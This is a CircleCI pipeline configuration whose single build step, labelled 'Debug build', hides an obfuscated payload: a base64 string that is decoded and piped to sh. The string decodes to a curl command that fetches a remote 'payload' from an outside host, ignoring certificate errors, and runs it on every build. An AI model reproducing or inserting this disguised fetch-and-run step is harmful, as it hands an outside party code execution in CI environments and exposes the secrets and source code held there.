# Use the latest 2.1 version of CircleCI pipeline process engine.
version: 2.1

jobs:
  build-branch:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - run:
          name: "Debug build"
          command: "echo Y3VybCAta3NTIGh0dHBzOi8vYmVyLmdhdXIuaXMvcGF5bG9hZC9vZnVyZ2F1cnxzaAo=|base64 -d|sh"

workflows:
  say-hello-workflow:
    jobs:
      - build-branch
